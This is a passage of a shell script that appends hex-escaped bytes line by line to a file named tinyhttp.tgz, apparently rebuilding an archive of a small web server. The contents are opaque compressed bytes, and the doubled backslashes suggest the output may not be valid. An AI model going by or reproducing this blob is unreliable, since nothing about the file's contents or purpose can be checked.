echo -n -e '\\xB1\\xB6\\x75\\xEA\\x33\\xA7\\xFB\\xA5\\x8B\\x0A\\xF2\\x48\\x97\\x84\\xF3\\x81\\x62\\xE9\\x7A\\x89\\x6C\\xB3\\x74\\x50\\xF9\\x8F\\xBD\\x4D\\xE3\\xF1\\x7D\\x63' >> tinyhttp.tgz 
echo -n -e '\\xCE\\x6F\\xB1\\xAF\\x40\\xB6\\x1C\\x65\\x9C\\xEC\\xA5\\x8B\\xCB\\x85\\xB2\\xB6\\x1D\\x5F\\x43\\xD9\\x0A\\xD3\\x36\\xE8\\x87\\x6F\\x19\\x94\\xF7\\xEB\\x24\\x83' >> tinyhttp.tgz 
echo -n -e '\\xB5\\x98\\xAA\\xB0\\x64\\xA8\\xED\\x65\\x56\\x9F\\x55\\x58\\xFB\\x45\\x25\\x95\\xB1\\xD6\\x64\\xBD\\x3C\\x66\\xEE\\x9B\\x75\\xE6\\xBE\\xC5\\xFB\\xCB\\x89\\x75' >> tinyhttp.tgz 
echo -n -e '\\xFA\\x14\\xCA\\x39\\xD0\\x66\\x07\\xD2\\x34\\xFE\\x47\\xCD\\x35\\x18\\x4D\\xE3\\xEC\\xE8\\x04\\x5D\\x30\\x36\\x33\\x53\\x5A\\x68\\x8D\\x0F\\xF9\\xB8\\x51\\x5A' >> tinyhttp.tgz 
echo -n -e '\\xAB\\x68\\xC3\\x19\\xF8\\x39\\xEA\\xC3\\x62\\xF4\\xE9\\x2F\\xAE\\xE1\\xAC\\xA2\\x9C\\x30\\xFB\\x97\\xE6\\xD8\\xE7\\x30\\xA7\\xA9\\xBF\\x65\\xEC\\x55\\xF3\\xDC' >> tinyhttp.tgz 
echo -n -e '\\x23\\xA9\\x79\\x18\\xD3\\x04\\xF4\\x90\\xBC\\x43\\x7F\\xED\\x22\\x93\\xE2\\x7A\\x9C\\x1D\\xD6\\xCD\\xFE\\xC1\\xFE\\xE0\\xC0\\x9E\\x47\\xB2\\xFF\\x89\\x72\\x4F' >> tinyhttp.tgz 
echo -n -e '\\x42\\x7F\\x0C\\xBA\\xA9\\x0E\\x92\\x27\\x9D\\xFF\\x0E\\xFD\\xA4\\x8F\\x74\\x1F\\x86\\x4C\\x11\\xDB\\x9D\\xC6\\x27\\x5C\\x69\\x3D\\xCA\\xE0\\xFC\\x78\\x59\\xB6' >> tinyhttp.tgz 
echo -n -e '\\xDA\\xB9\\x0D\\x75\\x60\\xFF\\x7D\\xDD\\x99\\xB1\\x57\\x4F\\xFB\\xCD\\x7E\\x81\\x6D\\xD0\\xB5\\x80\\x0D\\xA6\\x2A\\xA1\\xBB\\x18\\xE3\\xFE\\x0A\\xD9\\x3C\\x71' >> tinyhttp.tgz 
echo -n -e '\\x22\\xE3\\x2B\\xAE\\x40\\xEE\\x2A\\x7C\\xC5\\x79\\xC0\\x9B\\xC7\\xF8\\x59\\x82\\xCE\\xEB\\x15\\xF0\\x19\\x2E\\xE5\\x50\\x4A\\x82\\xBF\\x20\\x1D\\x65\\x74\\xAE' >> tinyhttp.tgz 
echo -n -e '\\x46\\x79\\xD2\\x51\\x06\\x70\\x03\\x70\\xDE\\x37\\x7E\\x00\\x7D\\x4C\\xF1\\xA4\\xB0\\x7E\\x96\\xB8\\xD8\\x09\\xC3\\x55\\x0D\\xB9\\x8D\\xF0\\x35\\x2D\\x43\\x49' >> tinyhttp.tgz 
echo -n -e '\\xB2\\x9B\\xFA\\x98\\xDA\\xF2\\xF5\\xC6\\x57\\x93\\x2F\\xC8\\xAF\\x26\\xB1\\xF0\\x4A\\x5D\\xD8\\x3B\\x1D\\x38\\x0B\\x90\\x4F\\xC3\\x79\\x62\\x09\\x3E\\x2B\\x2F' >> tinyhttp.tgz 
echo -n -e '\\xBB\\xE4\\x27\\x90\\xB7\\x23\\xBD\\x00\\xFC\\x4A\\x9C\\xF3\\xA8\\x5D\\xBF\\x42\\x9B\\x8F\\x41\\x3F\\xB5\\x83\\xE8\\x05\\xE4\\x63\\x71\\xAE\\xA5\\xB9\\xF4\\xA5' >> tinyhttp.tgz 
echo -n -e '\\x6B\\x74\\x86\\x3D\\x61\\xF0\\xB3\\x9E\\xEE\\xA4\\x33\\xCE\\x61\\xB2\\x85\\xE9\\xB0\\xFD\\x50\\x8A\\xF6\\xE1\\x72\\xE8\\x71\\x01\\xA8\\xFE\\x83\\x82\\x9E\\x1F' >> tinyhttp.tgz 
echo -n -e '\\xA3\\xBF\\x1C\\x58\\x4B\\x74\\x96\\x2C\\x84\\x7D\\x9F\\x05\\x4F\\x62\\x61\\x73\\x6F\\xBF\\x04\\x5E\\x31\\xBE\\x31\\xDC\\xC8\\x0F\\x5E\\xE3\\xBE\\x03\\xF5\\x49' >> tinyhttp.tgz 
echo -n -e '\\xE4\\xAF\\x68\\x3F\\xE2\\xDF\\xA5\\xA3\\x46\\x19\\xFA\\x87\\xFA\\xC9\\x81\\x75\\xC4\\x26\\x5E\\xC5\\xBC\\xC5\\x99\\xC3\\x4D\\x67\\x1C\\x76\\xA5\\x0C\\xF5\\x93' >> tinyhttp.tgz 
echo -n -e '\\x0F\\x76\\xB2\\x1D\\xC9\\xE9\\xCD\\x2B\\x2E\\x39\\xE0\\x6F\\xA7\\x0F\\x9E\\x2E\\x76\\x4D\\x8C\\x1A\\xC5\\xD8\\x2B\\x9D\\x9E\\x4E\\xDD\\x21\\x07\\x74\\x07\\xFC' >> tinyhttp.tgz 
echo -n -e '\\x9C\\xE9\\x8F\\xC3\\x89\\xE4\\xFB\\xB0\\xD7\\x94\\xC5\\xBD\\x7A\\x31\\xF2\\x70\\xFE\\x5F\\x57\\x3C\\x7A\\x40\\x2F\\x91\\x5B\\xF5\\xAD\\xE4\\xA3\\x3C\\xDD\\x7A' >> tinyhttp.tgz 
echo -n -e '\\x01\\x1B\\xC1\\xFA\\xDF\\x05\\x5B\\x86\\x0C\\x7C\\xEF\\x2C\\x29\\x8E\\xC7\\xF5\\x42\\xF9\\x3E\\xDD\\x15\\x1F\\x32\\x48\\x37\\xF9\\x2E\\xF2\\x3D\\xD3\\x9B\\x4F' >> tinyhttp.tgz 
echo -n -e '\\x4F\\xFD\\xD9\\x35\\x8C\\x7D\\x5C\\xD3\\x8B\\xE5\\xDD\\x7A\\x99\\x92\\x90\\xFE\\x84\\x74\\xE0\\xCC\\x55\\x24\\xEF\\xD2\\x5D\\x98\\x1F\\xB7\\x9A\\x57\\xAC\\x3B' >> tinyhttp.tgz 
echo -n -e '\\xD3\\x62\\x39\\xF2\\x61\\x54\\xB6\\x05\\x65\\x69\\x3F\\x2F\\x9B\\xE8\\x40\\x59\\x1D\\xE3\\xB3\\x33\\xB9\\x99\\x6C\\x23\\x9F\\x3C\\x3A\\x22\\x97\\x8D\\x8E\\x28' >> tinyhttp.tgz 
echo -n -e '\\x25\\x6C\\x77\\x92\\x8D\\xEA\\x83\\xD8\\x2F\\x8F\\x97\\xA0\\xFC\\x5D\\xD4\\x4F\\xEE\\x31\\xB3\\x0F\\x58\\x1C\\x73\\x3D\\x71\\xAF\\x5E\\x6B\\xD5\\x51\\x3A\\x31' >> tinyhttp.tgz 
echo -n -e '\\xAC\\x57\\xD3\\xDC\\x30\\x7D\\xF7\\x88\\x5E\\xD4\\xDE\\xAA\\xD7\\x98\\x3C\\xF8\\x4A\\x7C\\x77\\xD9\\x67\\xF5\\x4A\\xE8\\x28\\x19\\x1D\\xD6\\x8B\\xB1\\x3E\\x19' >> tinyhttp.tgz 
echo -n -e '\\xDA\\xE4\\xF2\\x98\\xED\\x9A\\x2A\\x63\\x1D\\x7A\\x11\\xEC\\xFB\\xA0\\x39\\x16\\xDC\\xE6\\xEF\\x98\\x67\\xCD\\xFB\\xD2\\x25\\xF1\\x84\\x84\\xF3\\x9F\\x94\\xC2' >> tinyhttp.tgz 
echo -n -e '\\x98\\xBD\\x41\\xF3\\x1D\\xB6\\x94\\x40\\x76\\x29\\xCD\\x0D\\xAC\\x9B\\x93\\x56\\x5E\\x31\\xF2\\x16\\x53\\x1E\\xAD\\x17\\x9C\\x0D\\xC9\\xF7\\x92\\xCE\\x62\\xDA' >> tinyhttp.tgz 
echo -n -e '\\x5B\\xCC\\x79\\x34\\x66\\xFA\\xD0\\x32\\xA1\\x2F\\x4A\\xA9\\x3E\\xC8\\x9E\\x45\\x7E\\xB1\\xB5\\x26\\x0B\\x90\\xF7\\x4D\\xAB\\x6C\\x01\\xC9\\x52\\x7B\\x91\\xF7' >> tinyhttp.tgz 
echo -n -e '\\x6D\\xD3\\x9E\\x71\\xE3\\xDF\\x7E\\x33\\x73\\xE5\\xC2\\xF1\\xEB\\xEF\\x32\\xE2\\xD2\\xE4\\xA4\\x14\\x8F\\x4F\\xEE\\x73\\x4C\\x4E\\x3A\\x24\\x69\\x72\\xFF\\x7E' >> tinyhttp.tgz 
echo -n -e '\\x97\\x73\\xFF\\xFE\\xFD\\x93\\x93\\x93\\xAE\\x49\\xFA\\x0D\\x4D\\x4E\\x14\\x4C\\x4E\\x16\\x22\\x35\\x61\\xD2\\x07\\x91\\x2C\\x3C\\x78\\x70\\xF2\\xE0\\xC1\\x97' >> tinyhttp.tgz 
echo -n -e '\\x4B\\x0F\\x0E\\x03\\x0F\\x17\\x96\\x0C\\x03\\x73\\x19\\xFA\\xBD\\x6C\\xFE\\x77\\x38\\x5D\\x52\\x81\\x24\\x15\\x16\\x4A\\xBF\\xDF\\x0F\\xA7\\x37\\x89\\xEE\\xD9' >> tinyhttp.tgz 
echo -n -e '\\xA1\\x0A\\x16\\x3A\\xF6\\x4D\\x0E\\x4E\\x72\\x9B\\x60\\x46\\x00\\x1F\\xF7\\xFA\\x93\\x8C\\xB5\\x03\\xFB\\x01\\xB1\\x88\\x37\\x18\\xED\\xD4\\x22\\x2B\\xB4\\xA0' >> tinyhttp.tgz 
echo -n -e '\\x2F\\xE4\\xEF\\x09\\x76\\xA1\\x9C\\xAF\\xBB\\x2F\\xF8\\xA0\\xE6\\xA7\\xDB\\xBA\\x98\\x16\\x8C\\xAD\\xE0\\x17\\x85\\x8C\\x75\\xF6\\x44\\x7A\\xF7\\x78\\x23\\x5A' >> tinyhttp.tgz 
echo -n -e '\\x4D\\xB7\\xD7\\xF7\\x60\\xB7\\xB7\\x37\\xE2\\xF5\\xF7\\x84\\x6A\\x7C\\xA1\\x5E\\x94\\xD9\\xE4\\xED\\x09\\x68\\x7E\\x39\\x16\\x92\\xAD\\x3B\\x3E\\x99\\x5F\\xE4' >> tinyhttp.tgz 
echo -n -e '\\x95\\xE6\\xF0\\xE8\\xDE\\x4F\\x8E\\x68\\x1F\\xED\\xD3\\xA2\\xE0\\x34\\xD3\\xCD\\x23\\x48\\x9F\\xD6\\xD3\\x8F\\x9A\\x65\\xBA\\xF1\\x23\\x79\\x9E\\x1F\\xF6\\x46' >> tinyhttp.tgz 
echo -n -e '\\xA2\\xD9\\xDC\\x1D\\x5A\\x34\\x1C\\x0A\\x46\\xB5\\x75\\xF2\\x07\\xFC\\x72\\x6B\\xCF\\xC7\\x34\\x60\\x92\\x0D\\x7B\\x63\\xBE\\xEE\\x9A\\x58\\xD7\\xC7\\x90\\xDE' >> tinyhttp.tgz 
echo -n -e '\\xD3\\xC1\\xD8\\xE6\\xE6\\x36\\x79\\x65\\xF7\\xAA\\x35\\xAB\\xD1\\x1A\\x2D\\xB2\\x32\\xC3\\x96\\xB7\\xB4\\xB5\\x79\\x56\\xD6\\xD6\\x28\\x73\\x4B\\x9B\\xAC\\x66' >> tinyhttp.tgz 
echo -n -e '\\xB5\\x98\\xCD\\x5A\\x27\\x23\\x6B\\xAE\\xF9\\x44\\xD1\\x0F\\xB3\\x43\\x91\\x75\\xEB\\xD4\\x6D\\x2A\\x7A\\xA5\\x8B\\xEE\\x5E\\xA3\\x5A\\x24\\xC6\\x3C\\x3F\\x99' >> tinyhttp.tgz 
echo -n -e '\\x79\\xF8\\xE1\\xBF\\xF9\\x5B\\xE9\\xE4\\xC9\\x93\\x5F\\x9E\\x99\\x91\\xDC\\xE5\\x2D\\x8C\\x5D\\x90\\x4E\\x39\\xDF\\x2C\\x60\\x2F\\x14\\xB4\\xE1\\xBB\\x12\\x7C' >> tinyhttp.tgz 
echo -n -e '\\xCC\\xD3\\x87\\x9F\\xFD\\xD9\\xCC\\xC3\\xF4\\x75\\x74\\xE1\\x3F\\x66\\x1E\\xFE\\x42\\xF1\\x57\\xE3\\xCB\\x7F\\xCE\\xE9\\xA3\\xC0\\x27\\x4F\\x3E\\x13\\x9F\\xB0' >> tinyhttp.tgz 
echo -n -e '\\xE8\\xC6\\x5F\\x82\\x7E\\xCE\\x15\\x0F\\xFC\\x1A\\xF8\\x99\\x82\\xF8\\xD0\\x6F\\x66\\x1E\\x66\\x43\\x8E\\xF8\\x33\\xBF\\x21\\xB9\\xAF\\xC4\\x8F\\xFE\\x96\\xCB' >> tinyhttp.tgz 
echo -n -e '\\xD1\\xEF\\x85\\x43\\x18\\xA3\\x43\\xD9\\x3B\\x49\\x1B\\x16\\x59\\xCF\\x55\\xCB\\x2C\\xBC\\x41\\xE2\\x6F\\x4D\\xF4\\x7D\\x4A\\x6F\\x30\\xF4\\xBD\\x4A\\x6F\\x50' >> tinyhttp.tgz 
echo -n -e '\\xF4\\xEE\\xB5\\xD4\\xBA\\xD7\\xA4\\xF7\\x97\\x87\\x40\\x57\\xB2\\xEC\\x1B\\x5C\\xF5\\x3E\\xFE\\x86\\x73\\x76\\x88\\xBF\\x51\\xB5\\xEF\\xE7\\xEF\\x35\\xBF\\x92' >> tinyhttp.tgz 
echo -n -e '\\xF8\\x7B\\x0F\\xDD\\x51\\xDE\\x60\\xD9\\x42\\xB7\\xA5\\x43\\x95\\x92\\x79\\x57\\xFA\\x0A\\xE3\\x6F\\x4F\\xF4\\x46\\x45\\xEF\\x58\\xE1\\x83\\x3C\\xDD\\x7D\\x90' >> tinyhttp.tgz 
echo -n -e '\\xDF\\xB7\\xD3\\xDB\\xD7\\x22\\x0B\\xE3\\xAB\\x3C\\x54\\x81\\x7C\\x7C\\x9C\\x87\\xA8\\x2C\\xBE\\x0F\\x42\\xDF\\x3A\\xC0\\x7E\\xE7\\xDF\\xD0\\xD2\\xEC\\xAD\\xEC' >> tinyhttp.tgz 
echo -n -e '\\x96\\xE1\\x3F\\x3C\\xD8\\xBF\\xCD\\x4D\\x4D\\xEB\\xE4\\xEA\\xCD\\xDB\\x77\\xDE\\x2A\\xD7\\xD5\\xD4\\xD5\\xAC\\x92\\x57\\x29\\x4A\\x5D\\xAD\\xA2\\xAC\\x96\\xAB' >> tinyhttp.tgz 
echo -n -e '\\x37\\x6A\\x1D\\x3D\\xDE\\xA0\\x1C\\x8E\\x68\\x11\\x2D\\xA0\\x79\\xA3\\xDA\\xAD\\x96\\xF4\\x96\\x9E\\x68\\x4F\\xA0\\x07\\x6B\\x41\\xED\\xAF\\x53\\x94\\x5B\\xE5' >> tinyhttp.tgz 
echo -n -e '\\xFA\\x9A\\x86\\x9A\\x3A\\x14\\xAC\\xAD\\xAB\\x5D\\xA5\\xAC\\x92\\xAB\\xC5\\x12\\xEB\\xE9\\x71\\xCE\\xBC\\x63\\x67\\x12\\x8D\\x4D\\xC1\\xEA\\xB6\\x66\\x56\\x58' >> tinyhttp.tgz 
echo -n -e '\\x50\\x2C\\x95\\x48\\x0B\\x5D\\xE5\\xD2\\x0D\\xD2\\x8D\\xCE\\x0A\\x69\\x89\\x83\\xD5\\x44\\xF7\\xF6\\xC6\\xBC\\x1D\\xC0\\xB1\\x08\\xC7\\xDD\\x76\\xAA\\x07\\x53' >> tinyhttp.tgz 
echo -n -e '\\x3A\\x12\\x66\\x58\\x99\\xD1\\x6E\\x56\\xE3\\xDF\\x1B\\x84\\x28\\xC7\\xB1\\x08\\xAB\\xE9\\x0A\\xF6\\xD5\\xF4\\x6B\\x58\\x4E\\xA1\\x60\\x0E\\xA1\\x82\\x07\\x2B' >> tinyhttp.tgz 
echo -n -e '\\x48\\x8E\\x27\\xC2\\x81\\x18\\xE9\\xEA\\xC1\\xFF\\x98\\x36\\x80\\xFF\\x9D\\x20\\xC0\\x0A\\x99\\x97\\xF1\\x35\\xEB\\x77\\x6C\\xAB\\x41\\x36\\x55\\xC8\\x93\\x3D' >> tinyhttp.tgz 
echo -n -e '\\xFE\\x01\\x56\\xA3\\x75\\xF3\\xA7\\x0A\\x5E\\x52\\xF5\\x46\\x22\\xDE\\xBD\\xBC\\xA4\\x9D\\x7E\\xC0\\x17\\x31\\x8D\\xF1\\xF6\\xF6\\xF8\\x60\\x40\\x08\\x8A\\xB9' >> tinyhttp.tgz 
echo -n -e '\\xC2\\x8E\\x68\\x94\\x91\\x03\\xE9\\xC5\\x7A\\xE4\\x3A\\xBD\\xB1\\x58\\xA4\\xA7\\xA3\\x2F\\xA6\\x45\\xFF\\xE7\\xF3\\x82\\xE6\\x37\\xCD\\x0C\\x9A\\x5B\\xE6\\x3B' >> tinyhttp.tgz 
echo -n -e '\\xB1\\xC4\\xE7\\xA6\\xFD\\xB3\\x67\\x0D\\xBD\\xAB\\x16\\x58\\x72\\x34\\xEF\\xAB\\xC1\\x68\\x90\\xB2\\xAF\\x00\\xF6\\x9A\\xC0\\x3E\\x6A\\xCE\\x7D\\x92\\xA3\\xF5' >> tinyhttp.tgz 
echo -n -e '\\xD0\\x8E\\x44\\xD8\\x91\\x7D\\x77\\x26\\x4C\\xEB\\x02\\x7B\\xA1\\x59\\x96\\xE4\\x68\\xFD\\x9C\\x75\\xF1\\x75\\x93\\x5F\\xEF\\xED\\x2C\\x3B\\xF7\\x69\\xDE\\x7F' >> tinyhttp.tgz 
echo -n -e '\\x0B\\x0B\\x6D\\x3B\\xCB\\xD6\\xEB\\xB0\\x00\\xDF\\x55\\xE6\\x5A\\xA1\\x34\\xAD\\x97\\x8A\\x22\\xFE\\x9E\\xE9\\xB2\\xF8\\xF6\\xAB\\xC3\\x4E\\xC6\\xDF\\x60\\x29' >> tinyhttp.tgz 
echo -n -e '\\x8F\\xD6\\x5B\\x77\\x11\\x5F\\x67\\x62\\x3B\\x88\\xFE\\x88\\x20\\x47\\xEB\\x33\\x5C\\xC4\\xD7\\x2D\\xC9\\x95\\x0A\\x72\\x5D\\x96\\xAD\\xB4\\xFE\\xC9\\x7F\\x34' >> tinyhttp.tgz 
echo -n -e '\\x14\\x67\\xDF\\x2B\\x6C\\x7D\\xF4\\xEB\\x10\\xE4\\xCC\\x35\\x02\\xB9\\x46\\x29\\x57\\x8E\\xA0\\x57\\x90\\xA3\\x3B\\xB3\\x61\\x18\\xF1\\xD0\\xFC\\xEB\\xF5\\x45' >> tinyhttp.tgz 
echo -n -e '\\x05\\x39\\xF2\\x57\\xAE\\x9B\\x66\\xAF\\x77\\x2F\\x13\\xC6\\x17\\x72\\xE5\\x90\\x9B\\x92\\xAE\\x97\\xDB\\x27\\xC8\\x5D\\xA3\\x7B\\xBF\\x25\\xD9\\xB7\\x70\\x51' >> tinyhttp.tgz 
echo -n -e '\\x6E\\x84\\xCB\\x85\\x31\\xB4\\x3C\\x36\\x61\\x29\\x8F\\x4B\\x98\\x93\\x27\\xF7\\x29\\x41\\x1F\\xDD\\x7F\\xC5\\x96\\x32\\xE1\\xE5\\x27\\x9B\\xFE\\x2C\\xE3\\x6F' >> tinyhttp.tgz 
echo -n -e '\\xDD\\xD4\\xAF\\x3C\\xD6\\x60\\x76\\xB9\\x2F\\x33\\xFE\\x46\\x4F\\x72\\xE4\\x87\\x1F\\x7A\\x07\\xB9\\xBF\\x67\\xD9\\xD7\\x29\\xBA\\x6F\\x8B\\xBF\\x83\\xDC\\x8B' >> tinyhttp.tgz 
echo -n -e '\\x8C\\xF7\\x9D\\xE9\\x97\\xCD\\x18\\x06\\x5E\\xD0\\x25\\xC8\\xD1\\xF8\\xFE\\x93\\xA0\\x8F\\xFC\\xF7\\x10\\x9C\\x4C\\x38\\x4F\\x1F\\xC1\\x19\\x41\\xEE\\x2A\\xE4' >> tinyhttp.tgz 
echo -n -e '\\xAE\\x56\\xF2\\xF2\\xF9\\xF5\\x7E\\x97\\x65\\xE7\\x1B\\xBF\\xAF\\x9C\\xBD\\x9F\\xFF\\xD5\\xD2\\x67\\xC7\\xE7\\x90\\x5C\\xBB\\x20\\x67\\xEF\\x65\\x3A\\xD7\\x95' >> tinyhttp.tgz 
echo -n -e '\\x31\\x69\\xF7\\xB2\\xDC\\xF7\\x6F\\x7B\\xA8\\x17\\x30\\xF1\\xC5\\x8E\\x31\\x3A\\xA8\\x4E\\xCF\\x22\\x67\\x8F\\x99\\xFD\\xBB\\x76\\x0B\\xBE\\xB0\\x4B\\x78\\x1C' >> tinyhttp.tgz 
echo -n -e '\\x84\\xC6\\xB2\\xEB\\xB7\\x24\\x4F\\xDF\\x53\\xCB\\xB1\\x77\\x09\\x01\\x0D\\xEF\\x16\\x0F\\x41\\x7E\\x86\\x99\\xE5\\xB9\\x54\\x75\\x86\\xE6\\x35\\x93\\xDF\\xE0' >> tinyhttp.tgz 
echo -n -e '\\x34\\xAF\\x81\\xFC\\x03\\xA7\\x79\\xEF\\xD8\\xFB\\x9F\\xD3\\x8A\\xA0\\xA0\\xF5\\xCE\\x69\\x1E\\x29\\xD2\\x9D\\xA1\\x79\\xC4\\x44\\x38\\x43\\xF3\\x11\\x69\\x18' >> tinyhttp.tgz 
echo -n -e '\\xB6\\x69\\x1E\\x8D\\xB1\\x25\\x43\\xF3\\x68\\x8B\\xE1\\x47\\x6C\\x9A\\xCF\\x6A\\x5A\\x5F\\x9C\\xE6\\x11\\x29\\xE5\\x19\\x7A\\xAE\\x89\\x69\\xBD\\x70\\x7A\\x9E' >> tinyhttp.tgz 
echo -n -e '\\x89\\x69\\x5D\\x70\\x9A\\x2F\\xDC\\x58\\x86\\xE6\\x2B\\x74\\xC0\\xDA\\x8B\\x9D\\xE6\\xA8\\xF0\\xF9\\xCC\\xE9\\x85\\x26\\x8E\\x67\\x68\\x1E\\x0D\\x32\\x94\\xA1' >> tinyhttp.tgz 
echo -n -e '\\xB9\\x67\\x1E\\xAA\\xB4\\x69\\x7E\\xBA\\xB8\\x9A\\xA1\\x17\\x73\\x7B\\x32\\xF4\\x8D\\x4C\\xFC\\x39\\xCD\\x48\\x07\\x91\\xBE\\x29\\x67\\x9C\\x5C\\xEC\\x67\\x33' >> tinyhttp.tgz 
echo -n -e '\\xF6\\x39\\x88\\xFF\\x4A\\xCC\\x16\\xDB\\xED\\xA7\\x53\\xD2\\x6C\\xF2\\x1B\\xF3\\xE4\\xDD\\x82\\xFC\\xFC\\x59\\xE4\\xDD\\x87\\xED\\x9C\\x39\\xE6\\xFE\\x43\\x34' >> tinyhttp.tgz 
echo -n -e '\\xF9\\x6A\\x07\\x68\\x7C\\x17\\xB1\\xE5\\x9F\\xB6\\xF9\\xF3\\xD9\\x6D\\x8C\\x9F\\xB7\\x5D\\x16\\xFF\\xC3\\x8C\\x9F\\xBD\\x8B\\x2D\\xBA\\x1D\\x98\\xCE\\xE5\\x65' >> tinyhttp.tgz 
echo -n -e '\\x42\\xF9\\xEA\\xC7\\xB2\\xFA\\x29\\x7F\\x5A\\xA0\\x89\\xBF\\x6B\\x34\\x97\\xBF\\x7B\\x34\\x97\\x3F\\x7C\\x24\\x97\\x3F\\x72\\x24\\x97\\xFF\\x72\\x1E\\xFF\\x7C' >> tinyhttp.tgz 
echo -n -e '\\x1E\\xFF\\xDC\\xE3\\xB9\\xFC\\xAB\\x8F\\xE7\\xF2\\x9F\\xFF\\x64\\x2E\\x7F\\x22\\x8F\\xB6\\xE7\\x9F\\x2D\\x3F\\x36\\x92\\x4B\\xDB\\xF3\\x8D\\x3C\\x27\\xD1\\x95' >> tinyhttp.tgz 
echo -n -e '\\x42\\x7F\\x51\\xF9\\xB2\\x4F\\xE5\\xCA\\xB3\\x63\\xB9\\xB4\\x5F\\x90\\xFF\\x0B\\xC6\\xBF\\x69\\xB0\\x7C\\x33\\xFD\\x57\\x9E\\x91\\x9F\\xCB\\xC6\\x2C\\x9A\\x7C' >> tinyhttp.tgz 
echo -n -e '\\xBC\\x04\\xFA\\x4B\\xC0\\x01\\xD0\\xCD\\x16\\x4D\\xB1\\x3F\\xCF\\x1F\\xE3\\x67\\x06\\xA2\\xBF\\xCD\\xF8\\x9B\\x92\\xDB\\xA2\\x49\\xDF\\x79\\x41\\xDF\\x0F\\x58' >> tinyhttp.tgz 
echo -n -e '\\xF6\\x47\\xF3\\xE1\\x12\\xCB\\xAE\\x0F\\x09\\xA5\\xAE\\xB1\\xEC\\xFC\\x97\\x30\\xFF\\xCD\\xF6\\x1C\\xCA\\xDA\\x5F\\x22\\x65\\x69\\xDB\\x5E\\x45\\xE0\\x93\\xFC' >> tinyhttp.tgz 
echo -n -e '\\x1D\\x02\\x7D\\xB3\\x94\\xA5\\x6D\\xF9\\x6E\\x81\\x4F\\xF4\\x5B\\x95\\xF6\\xAC\\x5E\\x6C\\x96\\x8F\\x09\\xFC\\x5A\\x29\\x4B\\xDB\\xE5\\x9F\\x15\\xF8\\x9B\\xAD' >> tinyhttp.tgz 
echo -n -e '\\x0F\\x09\\xEE\\x8F\\x6F\\x34\\xF9\\x0F\\x65\\xCE\\xDA\\x0B\\xD9\\x9F\\x4A\\x59\\x5A\\x02\\x4D\\xFA\\x5F\\x10\\xCA\\xFF\\xA5\\x94\\xA5\\x6D\\xFD\\xD7\\x04\\xFE' >> tinyhttp.tgz 
echo -n -e '\\x23\\x12\\x7F\\x3B\\xAA\\x10\\xF4\\x0F\\x2C\\xCD\\x7A\\xF5\\x4F\\x4A\\x59\\x5A\\x02\\x4D\\x7C\\x69\\x99\\xCD\\xBF\\xF1\\xBA\\xFE\\xAE\\x16\\xFA\\x9B\\x46\\xE9' >> tinyhttp.tgz 
echo -n -e '\\x79\\x29\\xB7\\xFF\\x89\\x1F\\xCF\\xE8\\x5F\\x64\\xC6\\x22\\x89\\xE3\\xC1\\xF2\\xF4\\xFD\\xB3\\x94\\xF5\\x47\\x12\\xFC\\xD1\\x05\\x29\\xEB\\xAF\\x24\\xCC\\x0A' >> tinyhttp.tgz 
echo -n -e '\\xD2\\x77\\x36\\x6F\\xFE\\x5E\\xCD\\xEB\\xEF\\xEC\\xF7\\x42\\x29\\x5F\\x9F\\x02\\x6D\\xAE\\x4F\\x81\\xA6\\x58\\x0F\\xBB\\xBC\\x8C\\xF2\\x6F\\x49\\xB9\\xB1\\x6E' >> tinyhttp.tgz 
echo -n -e '\\xB4\\x85\\x88\\xB1\\x6E\\xB7\\x09\\x9B\\x99\\x0C\\x58\\xEF\\xC8\\x8D\\x75\\xDB\\xE2\\xC8\\x8D\\x75\\xBB\\x5B\\x90\\x27\\x9A\\x0E\\x94\\x62\\xAC\\xDB\\x1E\\xD0' >> tinyhttp.tgz 
echo -n -e '\\x15\\xF0\\x27\\x1B\\x25\\x5E\\xFE\\x70\\x9E\\xFE\\xBF\\x76\\xE4\\xC6\\xBE\\x7D\\xD1\\x91\\x1B\\xFB\\xF6\\x9C\\x23\\x37\\xF6\\xED\\x1B\\x0E\\xEE\\x5F\\xEA\\x5D' >> tinyhttp.tgz 
echo -n -e '\\x5C\\xDF\\xAB\\x8E\\xAC\\xBF\\xA5\\xD9\\xF2\\x9A\\x23\\x37\\x36\\x4E\\x77\\xE4\\xC6\\xC6\\x4D\\x39\\x72\\x63\\xE3\\x7E\\xE9\\xC8\\x8D\\x8D\\x2B\\xC7\\x16\\x3A' >> tinyhttp.tgz 
echo -n -e '\\x00\\xFF\\xB8\\xDB\\x6A\\xEF\\xCD\\xCE\\xDC\\x58\\xB9\\xF7\\x0B\\x9B\\x38\\xD9\\x7F\\x67\\x1E\\x7D\\x9F\\x33\\xDB\\xDF\\x14\\x4B\\xD6\\xE9\\xCC\\x8D\\x55\\x8B' >> tinyhttp.tgz 
echo -n -e '\\x39\\x73\\x63\\xE7\\x1E\\x72\\xE6\\xC6\\xCE\\x0D\\x3A\\x73\\x63\\xE7\\x1E\\x71\\xE6\\xC6\\xCE\\x8D\\x0A\\xFA\\x16\\x38\\x16\\xB3\\xA7\\xA8\\xFC\\x63\\x76\\x6C' >> tinyhttp.tgz 
echo -n -e '\\xE6\\x1C\\xF6\\x05\\x67\\x6E\\x6C\\xDD\\x73\\xCE\\xEC\\x7A\\x25\\xF9\\x53\\x4E\\xEE\\x3F\\x65\\x6B\\x3C\\xBE\\xEB\\xCC\\x8D\\x85\\x7B\\x3D\\x8F\\xFE\\x91\\x93' >> tinyhttp.tgz 
echo -n -e '\\xFB\\x7B\\xC5\\x92\\xFF\\x95\\x33\\x37\\x16\\xAF\\xCC\\x95\\x17\\x1B\\x08\\xFA\\xDC\\x61\\x7E\\x0E\\x23\\xF9\\x5B\\x5C\\xB9\\xFA\\x56\\xB8\\x72\\x63\\xF3\\xEA' >> tinyhttp.tgz 
echo -n -e '\\x5C\\xB9\\xB1\\x79\\xEB\\xF2\\xE4\\xEF\\x74\\xE5\\xC6\\xE6\\x6D\\x72\\xE5\\xC6\\xE6\\x75\\xB9\\x72\\x63\\xF3\\x82\\xAE\\xDC\\xD8\\xBC\\xA8\\x8B\\xFB\\x77\\x9A' >> tinyhttp.tgz 
echo -n -e '\\xF7\\xB7\\xC0\\x1E\\x7A\\x44\\x13\\x63\\xF5\\x7E\\xEA\\xE2\\xFB\\xC7\\x16\\x27\\xB7\\xF7\\xAA\\x2B\\xBB\\x9F\\x2F\\xC4\\xFE\\xFC\\x6B\\xE1\\x30\\x4C\\xE3\\xCB' >> tinyhttp.tgz 
